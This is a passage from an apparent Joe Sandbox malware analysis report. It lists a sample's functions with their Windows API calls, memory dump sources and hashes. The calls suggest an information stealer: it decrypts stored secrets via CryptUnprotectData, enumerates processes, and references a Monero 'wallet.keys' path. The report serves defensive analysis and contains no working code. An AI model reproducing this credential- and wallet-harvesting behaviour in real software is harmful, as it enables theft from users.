                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 433455689-1173974218
                  • Opcode ID: c7a8b874b4bbe4933a86301a47f63894918a4bbb2b034be2823b5feb71d7feb0
                  • Instruction ID: 6be5f57856d81976af004421d3024e42322c7e323ee9f88ee36b442bd0c6d416
                  • Opcode Fuzzy Hash: c7a8b874b4bbe4933a86301a47f63894918a4bbb2b034be2823b5feb71d7feb0
                  • Instruction Fuzzy Hash: 74121072950118ABEB14FB64DC96EED7378EF94300F4145A9B50AA6091EF306F49CFB2
                  Function 00D3C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00D3C871
                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00D3C87C
                  • lstrcat.KERNEL32(?,00D50B46), ref: 00D3C943
                  • lstrcat.KERNEL32(?,00D50B47), ref: 00D3C957
                  • lstrcat.KERNEL32(?,00D50B4E), ref: 00D3C978
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$BinaryCryptStringlstrlen
                  • String ID:
                  • API String ID: 189259977-0
                  • Opcode ID: 4fbf15880e6ca6eb212aea386dd5ac64ca229d3b172e9b6dd58a76328eac2a30
                  • Instruction ID: fd7de00554fd5d469e698d3289e9b37cd490d26014f38983f274d77d0f28cf92
                  • Opcode Fuzzy Hash: 4fbf15880e6ca6eb212aea386dd5ac64ca229d3b172e9b6dd58a76328eac2a30
                  • Instruction Fuzzy Hash: EF4170B591421EDFDB10DF90DD89BFEB7B8BB88705F1041A8E509A6280D7705A84DFA2
                  Function 00D37240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00D3724D
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D37254
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00D37281
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00D372A4
                  • LocalFree.KERNEL32(?), ref: 00D372AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                  • String ID:
                  • API String ID: 2609814428-0
                  • Opcode ID: 60ca03eb4728d864d7c5f140a560fab3a55ad206554a900b17c5001551236a41
                  • Instruction ID: a0f14374a0a4ed0602348e83a3ca322f6cd93249f4f57fa4afbeb20d22f0c997
                  • Opcode Fuzzy Hash: 60ca03eb4728d864d7c5f140a560fab3a55ad206554a900b17c5001551236a41
                  • Instruction Fuzzy Hash: 9B0152B5A40208BBDB10DFD4CD46F9E7778EB44700F104054FB09AB2C0D6B0AA409B66
                  Function 00D49600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D4961E
                  • Process32First.KERNEL32(00D50ACA,00000128), ref: 00D49632
                  • Process32Next.KERNEL32(00D50ACA,00000128), ref: 00D49647
                  • StrCmpCA.SHLWAPI(?,00000000), ref: 00D4965C
                  • CloseHandle.KERNEL32(00D50ACA), ref: 00D4967A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: 626d855e5582ba2ab2215a5cc3b3dae0534022bdd73c80f4c8029e4d98054f31
                  • Instruction ID: 4ee5a42057771e3a31d93aa1a58a769cf60671df3c376c2c6afd4742fdf733d6
                  • Opcode Fuzzy Hash: 626d855e5582ba2ab2215a5cc3b3dae0534022bdd73c80f4c8029e4d98054f31
                  • Instruction Fuzzy Hash: 48011E75A00208EBCF14DFA5CD58BEEB7F8EB48301F114188A90997280D7349B80DF62
                  Function 010FD967 Relevance: 6.6, Strings: 4, Instructions: 1650COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Mc$_d>$_|?$}-?Y
                  • API String ID: 0-131802988
                  • Opcode ID: 778d754a8b55475f14ff84e230236e591c3a1caa2e50adf77f14ae9cdc3e4f4d
                  • Instruction ID: 3bb7f40b6b7c3fcab1471f9b455bb18227eae9690f02513b9057e1043e172bba
                  • Opcode Fuzzy Hash: 778d754a8b55475f14ff84e230236e591c3a1caa2e50adf77f14ae9cdc3e4f4d
                  • Instruction Fuzzy Hash: 18B206F3A082049FE304AE2DEC8567ABBE5EF94320F1A493DEAC5C7744E63558058797
                  Function 00D48680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00D505B7), ref: 00D486CA
                  • Process32First.KERNEL32(?,00000128), ref: 00D486DE
                  • Process32Next.KERNEL32(?,00000128), ref: 00D486F3
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                  • CloseHandle.KERNEL32(?), ref: 00D48761
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                  • String ID:
                  • API String ID: 1066202413-0
                  • Opcode ID: 3aae8c1ff3ea28ac74c2c85773fdc52f4e3cc7c4031706ba3c82fdfcd63614ce
                  • Instruction ID: c6aaabc0814f4796f5c9e8047aec75910ba3f5f0d96f2c58fa041177af550b93
                  • Opcode Fuzzy Hash: 3aae8c1ff3ea28ac74c2c85773fdc52f4e3cc7c4031706ba3c82fdfcd63614ce
                  • Instruction Fuzzy Hash: 20312B71941218ABDB24DF54DC55FEEB778EF45700F104199E50AA61A0DB306A89CFB2
                  Function 00D48EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptBinaryToStringA.CRYPT32(00000000,00D35184,40000001,00000000,00000000,?,00D35184), ref: 00D48EC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptString
                  • String ID:
                  • API String ID: 80407269-0
                  • Opcode ID: 10d526b4fbf9630c705398c801ab458f032dac51d314a13cfeb82f7e6d7a5d0a
                  • Instruction ID: eaccbf661ddf919203f35a69ca8b57278e3e6f11e164508d3a122650a359e6e8
                  • Opcode Fuzzy Hash: 10d526b4fbf9630c705398c801ab458f032dac51d314a13cfeb82f7e6d7a5d0a
                  • Instruction Fuzzy Hash: 71111874200208BFDB00CF64D884FAF73A9AF89740F149458F9198B250DB76EC85EB71
                  Function 00D39AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                  Download Yara Rule
                  APIs
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34EEE,00000000,00000000), ref: 00D39AEF
                  • LocalAlloc.KERNEL32(00000040,?,?,?,00D34EEE,00000000,?), ref: 00D39B01
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34EEE,00000000,00000000), ref: 00D39B2A
                  • LocalFree.KERNEL32(?,?,?,?,00D34EEE,00000000,?), ref: 00D39B3F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptLocalString$AllocFree
                  • String ID:
                  • API String ID: 4291131564-0
                  • Opcode ID: bcb87221899f459d76dfd2557d74281706ea4331deb705a2a54c7853f479e7a6
                  • Instruction ID: 120917ecae51940dcfa74374313fee2550dec3dd8a6d98ea7fa7dbfa19d65597
                  • Opcode Fuzzy Hash: bcb87221899f459d76dfd2557d74281706ea4331deb705a2a54c7853f479e7a6
                  • Instruction Fuzzy Hash: BE11A4B4240208EFEB10CF64DC95FAAB7B5FB89700F248058F9199B390C7B5A941DB51
                  Function 00D47980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00D50E00,00000000,?), ref: 00D479B0
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D479B7
                  • GetLocalTime.KERNEL32(?,?,?,?,?,00D50E00,00000000,?), ref: 00D479C4
                  • wsprintfA.USER32 ref: 00D479F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                  • String ID:
                  • API String ID: 377395780-0
                  • Opcode ID: 66a5d8fb8d53fe71b617546a71303e85bf09cb84340d5b788f33c7ea459f5b5c
                  • Instruction ID: f565ec22e9d29f49563de3da586704529f090fc0957c512406adbf83a15e022e
                  • Opcode Fuzzy Hash: 66a5d8fb8d53fe71b617546a71303e85bf09cb84340d5b788f33c7ea459f5b5c
                  • Instruction Fuzzy Hash: 7A112AB2904118ABCB14DFD9DD45BBEB7F8FB4CB11F14425AF605A2280D3395940D7B2
                  Function 00D47A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00AFE128,00000000,?,00D50E10,00000000,?,00000000,00000000), ref: 00D47A63
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D47A6A
                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00AFE128,00000000,?,00D50E10,00000000,?,00000000,00000000,?), ref: 00D47A7D
                  • wsprintfA.USER32 ref: 00D47AB7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                  • String ID:
                  • API String ID: 3317088062-0
                  • Opcode ID: 7d39e3c1fe907fa0dd21e3c401c0a957b37854939702bb2b8ff2b492361e71f6
                  • Instruction ID: 54fec19354fc21b6df7f204724a13aa98b7b6bb6f2c826e59681ef597476c72b
                  • Opcode Fuzzy Hash: 7d39e3c1fe907fa0dd21e3c401c0a957b37854939702bb2b8ff2b492361e71f6
                  • Instruction Fuzzy Hash: 6F1182B1945218DFDB208B54DC49F59B778F744711F104395E90A932C0C7745A44CF62
                  Function 00D43720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                  Download Yara Rule
                  APIs
                  • CoCreateInstance.COMBASE(00D4E118,00000000,00000001,00D4E108,00000000), ref: 00D43758
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00D437B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
